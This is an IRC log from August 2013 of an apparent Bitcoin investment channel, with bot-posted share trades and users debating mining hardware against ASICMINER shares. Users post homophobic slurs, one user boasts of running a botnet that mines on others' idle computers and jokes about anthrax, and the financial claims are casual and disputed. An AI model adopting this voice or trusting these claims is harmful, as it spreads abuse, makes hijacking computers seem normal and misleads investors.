fine ass assbot Aug 23 23:00:22 i missed your small dick too <3 Aug 23 23:00:26 guys Aug 23 23:00:31 [HAVELOCK] [AM100] 6 @ 0.0275 = 0.165 BTC [-] Aug 23 23:00:37 [HAVELOCK] [AM100] 60 @ 0.0273 = 1.638 BTC [-] Aug 23 23:00:38 should I buy asic pt or a miner? Aug 23 23:01:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.03105 = 0.1863 BTC [-] Aug 23 23:01:19 Whatever you can afford Aug 23 23:01:42 the pt will get you 5% less divs Aug 23 23:02:08 ah wait Aug 23 23:02:21 nm Aug 23 23:03:03 yeah but Aug 23 23:03:13 what if the miner is outdated in a year Aug 23 23:03:26 even asics could be worthless a year from now Aug 23 23:03:32 Ok at first you sounded like you were asking something else Aug 23 23:03:37 [HAVELOCK] [AM100] 7 @ 0.02725 = 0.1908 BTC [-] Aug 23 23:03:37 [HAVELOCK] [AM100] 15 @ 0.027 = 0.405 BTC [-] Aug 23 23:03:40 if the code changes or the difficulty jumps Aug 23 23:03:44 but you're asking if you should invest in a miner or actual company right Aug 23 23:03:57 yeah if that company is ASICminer Aug 23 23:04:17 Unless you have big money, go with investing a company that you wish to invest in. Aug 23 23:04:26 into a* Aug 23 23:05:12 those block eruptr chips are now $50 a pop Aug 23 23:05:29 10 x 50 = $500 initial investment paid off within 5 months Aug 23 23:05:46 3330mh/s = $121/month Aug 23 23:05:49 i think Aug 23 23:05:50 um Aug 23 23:06:32 i reuse to BUY bitcoins Aug 23 23:06:37 I want the means of production Aug 23 23:06:40 [BTCTC] [COGNITIVE] 5 @ 0.2974 = 1.487 BTC [-] Aug 23 23:06:41 [BTCTC] [COGNITIVE] 10 @ 0.2995 = 2.995 BTC [+] Aug 23 23:06:46 you don't buy gold you buy the goldmine Aug 23 23:06:51 [BTCTC] [TAT.ASICMINER] 12 @ 0.03099 = 0.3719 BTC [-] Aug 23 23:07:27 or invest in someone who can buy the gold mine gleeming some of their profits? Aug 23 23:07:28 330 mh/s for 121? What calculator are you using? Aug 23 23:07:40 no 3330mh/s Aug 23 23:07:47 I heard ya Aug 23 23:08:07 [BTCTC] [LABCOIN] 85 @ 0.002628 = 0.2234 BTC [-] Aug 23 23:08:08 [BTCTC] [LABCOIN] 3 @ 0.002627 = 0.0079 BTC [-] Aug 23 23:08:10 [BTCTC] [LABCOIN] 200 @ 0.002627 = 0.5254 BTC [-] Aug 23 23:08:13 http://www.alloscomp.com/bitcoin/calculator Aug 23 23:08:16 Bitcoin Mining Calculator Aug 23 23:08:40 heed you should slow down and soak in more Aug 23 23:08:52 i have been soaking for a year Aug 23 23:08:59 You waited too long then Aug 23 23:09:02 i watch this market diligently Aug 23 23:09:06 [BTCTC] [ASICMINER-PT] 3 @ 3.01 = 9.03 BTC [-] Aug 23 23:09:09 >>too long Aug 23 23:09:10 if that were true you wouldnt be shopping for an ASIC Aug 23 23:09:19 what woudl i be shopping for then Aug 23 23:09:22 BFL? Aug 23 23:09:28 Avalon? Aug 23 23:09:30 ... Aug 23 23:09:32 O I needed a good laugh Aug 23 23:09:40 But no Aug 23 23:09:46 BFL please take my money rape my face Aug 23 23:09:58 Ok so I see we're done here Aug 23 23:10:04 BFLs are ASICs too Aug 23 23:10:05 [BTCTC] [LABCOIN] 911 @ 0.002624 = 2.3905 BTC [-] Aug 23 23:10:05 no plz Aug 23 23:10:15 yeah but i don't believe they exist Aug 23 23:10:18 vaporware Aug 23 23:10:37 [BTCTC] [ASICMINER-PT] 5 @ 3.01 = 15.05 BTC [-] Aug 23 23:10:40 they are creating new products that don't exist and are failing to deliver products that don't exist Aug 23 23:10:48 In order to actually make your money back and then some, you need to invest at least $5,000+ Aug 23 23:10:50 the point is you should already know that buying an existing ASIC machine is a waste of money in most cases Aug 23 23:10:51 Expect that Aug 23 23:10:56 "Please buy this graphics card with a nuclear generator" Aug 23 23:11:12 I am aware of this Aug 23 23:11:15 however Aug 23 23:11:18 [BTCTC] [BFMINES] 1 @ 0.0036 BTC [-] Aug 23 23:11:29 a yeild of %1 or more is worth it Aug 23 23:11:38 when dealing with investments Aug 23 23:11:51 separately, you would also realize that "should I buy ASICMINER shares" is a loaded question Aug 23 23:11:54 You're better off buying btc, then investing into a company you're comfortable with and then "produce" btc off that. Aug 23 23:11:58 Yes Aug 23 23:12:04 but ASIC miners are real Aug 23 23:12:11 I can buy one and actually ave it Aug 23 23:12:25 this is what has lead to the recent rise in btc price Aug 23 23:12:41 remember that ASICminer has the power to hash 50% of the system Aug 23 23:12:49 possibly 75% Aug 23 23:12:49 ... Aug 23 23:12:51 ok i'm done Aug 23 23:12:56 why? Aug 23 23:12:56 what? Aug 23 23:12:57 anyone wanna take this? Aug 23 23:13:01 where do you get these numbers? Aug 23 23:13:04 But their hardware is quickly becoming outdated, you need to do more research Aug 23 23:13:17 research being the key word here Aug 23 23:13:18 currently they are the only ones hashing at 10Ths Aug 23 23:13:24 research Aug 23 23:13:27 o_O? Aug 23 23:13:32 www.ghash.io Aug 23 23:13:35 I will get the numbers wait here Aug 23 23:13:38 ;;nethash Aug 23 23:13:39 539222.447887 Aug 23 23:13:50 www.asicminercharts.com Aug 23 23:13:55 i just gave you someone hashing more than them Aug 23 23:15:21 lol Aug 23 23:15:24 >>private Aug 23 23:15:28 Heed, you have obviously not done enough research into this matter, and obviously you need to do more if you're going to spending any sort of cash. I honestly can't tell if you're trolling Aug 23 23:16:17 I am asking questions, I thought this was the place Aug 23 23:16:25 [BTCTC] [TAT.ASICMINER] 67 @ 0.03033 = 2.0321 BTC [-] Aug 23 23:16:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.03032 = 1.516 BTC [-] Aug 23 23:16:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.03 = 0.12 BTC [-] Aug 23 23:16:32 whats your question Aug 23 23:16:49 whether ASICPT is a good investment or an ASICminer Aug 23 23:16:50 [BTCTC] [KENILWORTH] 75 @ 0.001798 = 0.1349 BTC [+] Aug 23 23:17:05 I don't see how any rational person could give BFL money Aug 23 23:17:24 If those are your only two options, then "asicpt" is your true choice. Aug 23 23:17:29 heed, do you mean going with the pass through or direct shares for ASIC Miner? Aug 23 23:17:34 agreed Aug 23 23:17:41 no Aug 23 23:17:41 No he's asking whether to get a miner or buy shares Aug 23 23:17:46 ohhh Aug 23 23:17:49 yes Aug 23 23:17:53 Shares Aug 23 23:17:56 Buy shares Aug 23 23:18:03 Every time I bring up the BFL scam i get told that I'm a poor faggot Aug 23 23:18:14 i dont think thats why Aug 23 23:18:17 but I know vaporwar when i see it Aug 23 23:18:22 ^^ Aug 23 23:18:32 BFL does have products, just not enough Aug 23 23:18:40 That too Aug 23 23:18:43 and dont know how to run a business Aug 23 23:18:50 It's more so scamware than vaporware Aug 23 23:19:01 [BTCTC] [ACTIVEMINING] 3 @ 0.005498 = 0.0165 BTC [+] Aug 23 23:19:05 pretty much, id avoid them Aug 23 23:19:29 plus, PCI miners was my idea Aug 23 23:19:36 as well as cell phone miners Aug 23 23:19:43 i will sue! Aug 23 23:19:46 im working on a toaster miner Aug 23 23:19:54 ok you have the patents onthose? Aug 23 23:19:58 heated floor miners Aug 23 23:19:58 sigh Aug 23 23:20:10 No the floor lava miners Aug 23 23:20:10 botnets Aug 23 23:20:16 that was my invention Aug 23 23:20:16 botnets peaked Aug 23 23:20:33 i invented inventing Aug 23 23:20:35 so there Aug 23 23:20:40 well i have a patent on it Aug 23 23:20:44 from while you were inventing it Aug 23 23:20:48 I had a botnet allocating excess cpu processing to bitcoin mining Aug 23 23:20:50 oh yeah? Aug 23 23:20:53 when in sleep mode Aug 23 23:20:53 I invented ThickAsThieves Aug 23 23:20:58 noooooo Aug 23 23:21:04 Ok Apple Aug 23 23:21:12 hehe Aug 23 23:21:21 heed, probably dont wanna go around telling people you run botnets Aug 23 23:21:40 I also am trying to isolate new deadly anthra strains Aug 23 23:21:43 From the sounds of it, you probably don't want to do much talking in general Aug 23 23:21:45 *antrax* Aug 23 23:21:51 *anthrax* Aug 23 23:21:58 [BTCTC] [LABCOIN] 85 @ 0.002682 = 0.228 BTC [+] Aug 23 23:22:03 NSA is full of fags Aug 23 23:22:25 i wore the google glass today Aug 23 23:22:28 for real though Aug 23 23:22:32 pretty cool Aug 23 23:22:46 [BTCTC] [LABCOIN] 21 @ 0.002681 = 0.0563 BTC [-] Aug 23 23:22:47 [BTCTC] [LABCOIN] 113 @ 0.002685 = 0.3034 BTC [+] Aug 23 23:22:49 [BTCTC] [LABCOIN] 466 @ 0.002686 = 1.2517 BTC [+] Aug 23 23:23:09 google spy cam Aug 23 23:23:16 no facial recog yet Aug 23 23:23:21 but it will be included Aug 23 23:23:23 spy on people while being spied on! Aug 23 23:23:23 [BTCTC] [LABCOIN] 40 @ 0.002686 = 0.1074 BTC [+] Aug 23 23:23:29 [BTCTC] [TAT.ASICMINER] 60 @ 0.03073 = 1.8438 BTC [+] Aug 23 23:23:32 no one is spying if were all spying Aug 23 23:23:34 they have applications that can identify people by their clothing styles Aug 23 23:23:47 I can only imagine they have other ways of identifying you Aug 23 23:23:53 the way you walk Aug 23 23:23:54 they have xray modes yet? Aug 23 23:23:57 the way you sound Aug 23 23:23:58 etc Aug 23 23:24:08 [BTCTC] [BTC-GOLD] 9 @ 0.025 = 0.225 BTC [+] Aug 23 23:24:09 i wont buy it without xray mode Aug 23 23:24:16 I will stay inside with my tinfoil hat thanks google Aug 23 23:24:22 ok nice talking to you guys l8er Aug 23 23:25:10 [BTCTC] [DMS.MINING] 1 @ 0.003467 BTC [+] Aug 23 23:25:11 Now I feel better Aug 23 23:25:32 [BTCTC] [ACTIVEMINING] 6 @ 0.005496 = 0.033 BTC [-] Aug 23 23:25:34 [BTCTC] [ACTIVEMINING] 26 @ 0.005497 = 0.1429 BTC [+] Aug 23 23:26:51 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Aug 23 23:28:02 [BTCTC] [ACTIVEMINING] 3 @ 0.00551 = 0.0165 BTC [+] Aug 23 23:30:31 http://variety.com/2013/film/news/fans-petition-warner-bros-to-remove-ben-affleck-as-batman-1200587228/ Aug 23 23:30:35 Fans Petition Warner Bros. to Remove Ben Affleck as Batman | Variety Aug 23 23:31:52 [BTCTC] [BTC-GROWTH] 4 @ 0.099 = 0.396 BTC [-] Aug 23 23:31:54 http://thehill.com/blogs/hillicon-valley/technology/318529-new-york-times-partners-with-the-guardian-on-nsa-surveillance Aug 23 23:32:03 New York Times partners with The Guardian on NSA surveillance - The Hill's Hillicon Valley Aug 23 23:35:34 [BTCTC] [ASICMINER-PT] 4 @ 3.02 = 12.08 BTC [+] Aug 23 23:35:36 [BTCTC] [DMS.MINING] 25 @ 0.003467 = 0.0867 BTC [+] Aug 23 23:37:00 [BTCTC] [DMS.MINING] 3 @ 0.003468 = 0.0104 BTC [+] Aug 23 23:38:19 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001221 = 0.1221 BTC [-] Aug 23 23:38:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00122 BTC [-] Aug 23 23:38:21 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.00122 = 0.0061 BTC [-] Aug 23 23:38:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00122 BTC [-] Aug 23 23:38:22 [BTCTC] [TAT.VIRTUALMINE] 35 @ 0.0012 = 0.042 BTC [-] Aug 23 23:38:23 [BTCTC] [TAT.VIRTUALMINE] 215 @ 0.0012 = 0.258 BTC [-] Aug 23 23:38:25 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.001191 = 0.0119 BTC [-] Aug 23 23:38:26 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00119 = 0.0048 BTC [-] Aug 23 23:38:27 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00119 = 0.0036 BTC [-] Aug 23 23:38:28 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00119 = 0.0024 BTC [-] Aug 23 23:38:29 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00119 = 0.0036 BTC [-] Aug 23 23:38:30 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.001121 = 0.037 BTC [-] Aug 23 23:38:31 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00112 BTC [-] Aug 23 23:38:31 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0011 BTC [-] Aug 23 23:39:22 [MPEX] [S.MG] 5000 @ 0.000235 = 1.175 BTC [-] Aug 23 23:39:43 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002519 = 0.0252 BTC [+] Aug 23 23:39:45 [BTCTC] [TAT.MINIGAME] 61 @ 0.0002509 = 0.0153 BTC [-] Aug 23 23:39:47 [BTCTC] [TAT.MINIGAME] 500 @ 0.0002499 = 0.125 BTC [-] Aug 23 23:40:33 [HAVELOCK] [AM100] 1 @ 0.0268 BTC [-] Aug 23 23:41:41 [HAVELOCK] [SDSTM] 1 @ 0.005 BTC [-] Aug 23 23:42:14 [HAVELOCK] [XBOND] 200 @ 0.00108003 = 0.216 BTC [-] Aug 23 23:43:42 [BTCTC] [DMS.MINING] 2 @ 0.003468 = 0.0069 BTC [+] Aug 23 23:43:45 [MPEX] [S.MPOE] 3800 @ 0.00081497 = 3.0969 BTC [-] Aug 23 23:44:28 [BTCTC] [HOSTED-MINING] 18 @ 0.28 = 5.04 BTC [+] Aug 23 23:44:31 [BTCTC] [COGNITIVE] 9 @ 0.3 = 2.7 BTC [+] Aug 23 23:45:14 [BTCTC] [DMS.MINING] 1 @ 0.00347 BTC [+] Aug 23 23:46:25 [BTCTC] [ASICMINER-PT] 4 @ 3.75 = 15 BTC [+] Aug 23 23:46:38 [BTCTC] [COGNITIVE] 8 @ 0.32 = 2.56 BTC [+] Aug 23 23:46:47 [HAVELOCK] [AM100] 1 @ 0.0265 BTC [-] Aug 23 23:46:53 [HAVELOCK] [AM100] 2 @ 0.0263 = 0.0526 BTC [-] Aug 23 23:47:02 [HAVELOCK] [AM100] 3 @ 0.0261 = 0.0783 BTC [-] Aug 23 23:47:06 [HAVELOCK] [AM100] 2 @ 0.026 = 0.052 BTC [-] Aug 23 23:47:10 [HAVELOCK] [AM100] 1 @ 0.026 BTC [-] Aug 23 23:47:16 [HAVELOCK] [AM100] 15 @ 0.0254 = 0.381 BTC [-] Aug 23 23:47:19 [HAVELOCK] [AM100] 1 @ 0.0253 BTC [-] Aug 23 23:47:23 [HAVELOCK] [AM100] 5 @ 0.0253 = 0.1265 BTC [-] Aug 23 23:47:29 [HAVELOCK] [AM100] 10 @ 0.02525 = 0.2525 BTC [-] Aug 23 23:47:34 [HAVELOCK] [AM100] 80 @ 0.0252 = 2.016 BTC [-] Aug 23 23:47:39 [HAVELOCK] [AM100] 20 @ 0.02512001 = 0.5024 BTC [-] Aug 23 23:47:43 [HAVELOCK] [AM100] 12 @ 0.02512 = 0.3014 BTC [-] Aug 23 23:47:49 [HAVELOCK] [AM100] 500 @ 0.02512 = 12.56 BTC [-] Aug 23 23:47:56 [HAVELOCK] [AM100] 400 @ 0.0251 = 10.04 BTC [-] Aug 23 23:48:46 [BTCTC] [ASICMINER-PT] 1 @ 2.981 BTC [-] Aug 23 23:48:48 [BTCTC] [ASICMINER-PT] 1 @ 2.98 BTC [-] Aug 23 23:48:49 [BTCTC] [ASICMINER-PT] 12 @ 2.941 = 35.292 BTC [-] Aug 23 23:49:19 [BTCTC] [DMS.PURCHASE] 200 @ 0.0205 = 4.1 BTC [-] Aug 23 23:49:20 [BTCTC] [DMS.PURCHASE] 20 @ 0.0205 = 0.41 BTC [-] Aug 23 23:50:28 [BTCTC] [DMS.PURCHASE] 378 @ 0.02052 = 7.7566 BTC [+] Aug 23 23:50:50 [BTCTC] [LABCOIN] 71 @ 0.002685 = 0.1906 BTC [-] Aug 23 23:50:51 [BTCTC] [LABCOIN] 55 @ 0.002686 = 0.1477 BTC [+] Aug 23 23:50:53 [BTCTC] [LABCOIN] 800 @ 0.002688 = 2.1504 BTC [+] Aug 23 23:50:54 [BTCTC] [LABCOIN] 152 @ 0.002695 = 0.4096 BTC [+] Aug 23 23:50:55 [BTCTC] [LABCOIN] 737 @ 0.002696 = 1.987 BTC [+] Aug 23 23:50:56 [BTCTC] [LABCOIN] 482 @ 0.002698 = 1.3004 BTC [+] Aug 23 23:50:57 [BTCTC] [LABCOIN] 524 @ 0.002739 = 1.4352 BTC [+] Aug 23 23:50:58 [BTCTC] [LABCOIN] 768 @ 0.00274 = 2.1043 BTC [+] Aug 23 23:50:59 [BTCTC] [LABCOIN] 831 @ 0.002741 = 2.2778 BTC [+] Aug 23 23:51:00 [BTCTC] [LABCOIN] 500 @ 0.002741 = 1.3705 BTC [+] Aug 23 23:51:58 [HAVELOCK] [LABCO] 190 @ 0.00258 = 0.4902 BTC [+] Aug 23 23:52:01 [HAVELOCK] [LABCO] 500 @ 0.00259 = 1.295 BTC [+] Aug 23 23:52:03 [HAVELOCK] [LABCO] 43 @ 0.002599 = 0.1118 BTC [+] Aug 23 23:52:05 [HAVELOCK] [LABCO] 3000 @ 0.0026 = 7.8 BTC [+] Aug 23 23:52:31 [HAVELOCK] [LABCO] 25 @ 0.0032888 = 0.0822 BTC [+] Aug 23 23:52:34 [HAVELOCK] [LABCO] 21 @ 0.003456 = 0.0726 BTC [+] Aug 23 23:53:15 [BTCTC] [ASICMINER-PT] 1 @ 2.941 BTC [-] Aug 23 23:53:17 [BTCTC] [ASICMINER-PT] 22 @ 2.94 = 64.68 BTC [-] Aug 23 23:54:41 [BTCTC] [DMS.MINING] 29 @ 0.003468 = 0.1006 BTC [-] Aug 23 23:54:42 [BTCTC] [DMS.MINING] 14 @ 0.003401 = 0.0476 BTC [-] Aug 23 23:54:44 [BTCTC] [DMS.MINING] 10 @ 0.003401 = 0.034 BTC [-] Aug 23 23:54:45 [BTCTC] [DMS.MINING] 35 @ 0.003401 = 0.119 BTC [-] Aug 23 23:54:46 [BTCTC] [DMS.MINING] 510 @ 0.0034 = 1.734 BTC [-] Aug 23 23:54:48 [HAVELOCK] [XBOND] 50 @ 0.0011 = 0.055 BTC [+] Aug 23 23:56:07 [BTCTC] [LABCOIN] 99 @ 0.002742 = 0.2715 BTC [+] Aug 23 23:57:10 [BTCTC] [LABCOIN] 101 @ 0.002742 = 0.2769 BTC [+] Aug 23 23:58:36 [BTCTC] [BTC-GROWTH] 85 @ 0.1 = 8.5 BTC [+] Aug 24 00:02:15 [BTCTC] [ACTIVEMINING] 22 @ 0.005644 = 0.1242 BTC [+] Aug 24 00:02:16 [BTCTC] [ACTIVEMINING] 89 @ 0.005645 = 0.5024 BTC [+] Aug 24 00:02:18 [BTCTC] [ACTIVEMINING] 439 @ 0.005649 = 2.4799 BTC [+] Aug 24 00:02:54 one thing i dont link about mpex stat is it doesn't tell you total of btc you have including orders Aug 24 00:09:53 [BTCTC] [LABCOIN] 95 @ 0.002742 = 0.2605 BTC [+] Aug 24 00:10:25 [BTCTC] [TAT.ASICMINER] 67 @ 0.02957 = 1.9812 BTC [-] Aug 24 00:10:26 [BTCTC] [TAT.ASICMINER] 28 @ 0.02956 = 0.8277 BTC [-] Aug 24 00:10:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.02902 = 0.0871 BTC [-] Aug 24 00:10:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.02901 = 0.087 BTC [-] Aug 24 00:10:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02901 BTC [-] Aug 24 00:10:31 [BTCTC] [TAT.ASICMINER] 14 @ 0.029 = 0.406 BTC [-] Aug 24 00:10:32 [BTCTC] [TAT.ASICMINER] 7 @ 0.02886 = 0.202 BTC [-] Aug 24 00:10:33 [BTCTC] [TAT.ASICMINER] 35 @ 0.02885 = 1.0098 BTC [-] Aug 24 00:10:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0287 BTC [-] Aug 24 00:10:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.0285 = 0.057 BTC [-] Aug 24 00:10:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0284 BTC [-] Aug 24 00:10:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0283 BTC [-] Aug 24 00:10:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.02821 = 0.0846 BTC [-] Aug 24 00:10:39 [BTCTC] [TAT.ASICMINER] 19 @ 0.0282 = 0.5358 BTC [-] Aug 24 00:10:40 [BTCTC] [TAT.ASICMINER] 53 @ 0.02803 = 1.4856 BTC [-] Aug 24 00:10:41 [BTCTC] [TAT.ASICMINER] 60 @ 0.02802 = 1.6812 BTC [-] Aug 24 00:10:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.02801 = 0.084 BTC [-] Aug 24 00:10:43 [BTCTC] [TAT.ASICMINER] 25 @ 0.02801 = 0.7003 BTC [-] Aug 24 00:10:44 [BTCTC] [TAT.ASICMINER] 25 @ 0.02801 = 0.7003 BTC [-] Aug 24 00:10:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [-] Aug 24 00:10:46 make a proxy parser tat. Aug 24 00:10:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.028 = 0.14 BTC [-] Aug 24 00:10:48 [BTCTC] [TAT.ASICMINER] 65 @ 0.028 = 1.82 BTC [-] Aug 24 00:10:48 [BTCTC] [TAT.ASICMINER] 78 @ 0.028 = 2.184 BTC [-] Aug 24 00:11:27 one more job for the dev guy, yeah Aug 24 00:11:38 [BTCTC] [BASIC-MINING] 1 @ 0.2794 BTC [+] Aug 24 00:12:55 uhh? Aug 24 00:13:07 everyone can code a few lines these days Aug 24 00:13:09 [BTCTC] [BASIC-MINING] 2 @ 0.2794 = 0.5588 BTC [+] Aug 24 00:13:20 not me, nor is it how i wanna spend my time Aug 24 00:13:23 [BTCTC] [BTC-GROWTH] 2 @ 0.1003 = 0.2006 BTC [+] Aug 24 00:13:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.03019 = 0.3019 BTC [+] Aug 24 00:13:42 like 3 minutes ? Aug 24 00:13:57 3 minutes if you know how to do it Aug 24 00:14:03 i can read some, and fuck with some code, but i havent actually coded in like 15yrs Aug 24 00:14:17 [BTCTC] [KENILWORTH] 449 @ 0.001798 = 0.8073 BTC [+] Aug 24 00:15:26 [BTCTC] [DMS.SELLING] 3 @ 0.01726 = 0.0518 BTC [+] Aug 24 00:15:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.03017 = 0.0905 BTC [-] Aug 24 00:16:16 [BTCTC] [ACTIVEMINING] 1191 @ 0.00561 = 6.6815 BTC [-] Aug 24 00:16:36 [BTCTC] [DMS.SELLING] 2 @ 0.01726 = 0.0345 BTC [+] Aug 24 00:16:56 [MPEX] [S.MPOE] 1453 @ 0.00083293 = 1.2102 BTC [+] Aug 24 00:16:57 [MPEX] [S.MPOE] 1240 @ 0.00083353 = 1.0336 BTC [+] Aug 24 00:17:25 [HAVELOCK] [XBOND] 3 @ 0.001149 = 0.0034 BTC [+] Aug 24 00:19:35 [BTCTC] [LABCOIN] 646 @ 0.002699 = 1.7436 BTC [-] Aug 24 00:21:27 [HAVELOCK] [XBOND] 100 @ 0.00115 = 0.115 BTC [+] Aug 24 00:21:30 [BTCTC] [LABCOIN] 4100 @ 0.0027 = 11.07 BTC [+] Aug 24 00:22:12 [HAVELOCK] [XBOND] 13 @ 0.0011646 = 0.0151 BTC [+] Aug 24 00:24:50 [HAVELOCK] [XBOND] 199 @ 0.00117 = 0.2328 BTC [+] Aug 24 00:24:53 [BTCTC] [ACTIVEMINING] 10 @ 0.00561 = 0.0561 BTC [-] Aug 24 00:27:26 [BTCTC] [BITVPS] 1 @ 0.0022 BTC [-] Aug 24 00:27:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001051 BTC [-] Aug 24 00:27:48 [BTCTC] [DMS.MINING] 1 @ 0.003624 BTC [+] Aug 24 00:28:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.02982 = 0.0596 BTC [-] Aug 24 00:28:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.02982 = 0.0596 BTC [-] Aug 24 00:29:04 [BTCTC] [BTC-GROWTH] 9 @ 0.1003 = 0.9027 BTC [+] Aug 24 00:34:18 [HAVELOCK] [SDSTM] 22 @ 0.005 = 0.11 BTC [-] Aug 24 00:36:40 [BTCTC] [ACTIVEMINING] 1599 @ 0.00561 = 8.9704 BTC [-] Aug 24 00:36:41 [BTCTC] [ACTIVEMINING] 2164 @ 0.0056 = 12.1184 BTC [-] Aug 24 00:37:07 [BTCTC] [LABCOIN] 85 @ 0.00263 = 0.2236 BTC [-] Aug 24 00:51:03 .d Aug 24 00:51:03 50810339.04828 | Next Diff in 131 blocks | Estimated Change: 28.9624% in 0d 15h 25m 8s Aug 24 00:57:20 15 yrs wat?! Aug 24 01:14:01 [BTCTC] [BITVPS] 2 @ 0.002285 = 0.0046 BTC [+] Aug 24 01:14:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001277 BTC [+] Aug 24 01:17:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02999 BTC [-] Aug 24 01:17:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.0299 BTC [-] Aug 24 01:17:27 [BTCTC] [ASICMINER-PT] 6 @ 3.75 = 22.5 BTC [+] Aug 24 01:17:59 [BTCTC] [ASICMINER-PT] 2 @ 3.5 = 7 BTC [-] Aug 24 01:21:51 [BTCTC] [BASIC-MINING] 1 @ 0.263 BTC [-] Aug 24 01:23:15 what do you guys think Labcoin be worth in 1 year? Aug 24 01:23:58 [BTCTC] [DMS.SELLING] 1 @ 0.01726 BTC [+] Aug 24 01:24:29 [BTCTC] [BASIC-MINING] 1 @ 0.2603 BTC [-] Aug 24 01:29:06 [BTCTC] [ACTIVEMINING] 584 @ 0.0056 = 3.2704 BTC [-] Aug 24 01:29:06 [BTCTC] [ACTIVEMINING] 50 @ 0.005629 = 0.2815 BTC [+] Aug 24 01:29:07 [BTCTC] [ACTIVEMINING] 176 @ 0.00563 = 0.9909 BTC [+] Aug 24 01:29:09 [BTCTC] [LABCOIN] 85 @ 0.002645 = 0.2248 BTC [+] Aug 24 01:29:31 [BTCTC] [LABCOIN] 20 @ 0.002644 = 0.0529 BTC [-] Aug 24 01:29:43 [BTCTC] [ACTIVEMINING] 17 @ 0.00563 = 0.0957 BTC [+] Aug 24 01:30:13 [BTCTC] [LABCOIN] 100 @ 0.00264 = 0.264 BTC [-] Aug 24 01:30:33 [BTCTC] [ACTIVEMINING] 1 @ 0.005629 BTC [-] Aug 24 01:41:22 [BTCTC] [BITVPS] 5 @ 0.002285 = 0.0114 BTC [+] Aug 24 01:41:33 [BTCTC] [DMS.SELLING] 16 @ 0.01726 = 0.2762 BTC [+] Aug 24 01:42:25 [BTCTC] [BTC-GROWTH] 35 @ 0.1003 = 3.5105 BTC [+] Aug 24 01:42:26 [BTCTC] [BTC-GROWTH] 37 @ 0.1004 = 3.7148 BTC [+] Aug 24 01:46:27 [BTCTC] [LABCOIN] 85 @ 0.002686 = 0.2283 BTC [+] Aug 24 01:46:29 [BTCTC] [LABCOIN] 20 @ 0.002688 = 0.0538 BTC [+] Aug 24 01:46:30 [BTCTC] [LABCOIN] 500 @ 0.002699 = 1.3495 BTC [+] Aug 24 01:46:31 [BTCTC] [LABCOIN] 300 @ 0.002699 = 0.8097 BTC [+] Aug 24 01:46:32 [BTCTC] [LABCOIN] 1000 @ 0.002699 = 2.699 BTC [+] Aug 24 01:46:33 [BTCTC] [LABCOIN] 1623 @ 0.0027 = 4.3821 BTC [+] Aug 24 01:46:34 [BTCTC] [LABCOIN] 790 @ 0.00274 = 2.1646 BTC [+] Aug 24 01:46:35 [BTCTC] [LABCOIN] 82 @ 0.002743 = 0.2249 BTC [+] Aug 24 01:47:19 [BTCTC] [LABCOIN] 85 @ 0.002742 = 0.2331 BTC [-] Aug 24 01:49:57 [BTCTC] [LABCOIN] 85 @ 0.002742 = 0.2331 BTC [-] Aug 24 01:51:36 [BTCTC] [DMS.SELLING] 4 @ 0.01726 = 0.069 BTC [+] Aug 24 01:52:18 [BTCTC] [ASICMINER-PT] 1 @ 2.903 BTC [-] Aug 24 01:52:20 [BTCTC] [ASICMINER-PT] 2 @ 2.902 = 5.804 BTC [-] Aug 24 01:52:21 [BTCTC] [ASICMINER-PT] 2 @ 2.891 = 5.782 BTC [-] Aug 24 01:52:22 [BTCTC] [ASICMINER-PT] 1 @ 2.89 BTC [-] Aug 24 01:52:52 [HAVELOCK] [AM100] 3 @ 0.0280999 = 0.0843 BTC [+] Aug 24 01:53:18 [BTCTC] [DMS.SELLING] 71 @ 0.01726 = 1.2255 BTC [+] Aug 24 01:53:42 [BTCTC] [DMS.SELLING] 1 @ 0.01726 BTC [+] Aug 24 01:54:05 [BTCTC] [DMS.MINING] 1 @ 0.003401 BTC [-] Aug 24 01:54:06 [BTCTC] [DMS.PURCHASE] 1 @ 0.02051 BTC [-] Aug 24 01:54:45 [BTCTC] [DMS.SELLING] 120 @ 0.01726 = 2.0712 BTC [+] Aug 24 01:54:47 [BTCTC] [DMS.MINING] 120 @ 0.0034 = 0.408 BTC [-] Aug 24 01:54:49 [BTCTC] [DMS.PURCHASE] 120 @ 0.02051 = 2.4612 BTC [-] Aug 24 01:55:06 [MPEX] [S.MPOE] 8767 @ 0.00082761 = 7.2557 BTC [-] Aug 24 01:55:33 [BTCTC] [DMS.SELLING] 35 @ 0.01727 = 0.6045 BTC [+] Aug 24 01:56:41 [BTCTC] [DMS.SELLING] 120 @ 0.01726 = 2.0712 BTC [-] Aug 24 01:56:43 [BTCTC] [DMS.MINING] 120 @ 0.0034 = 0.408 BTC [-] Aug 24 01:56:45 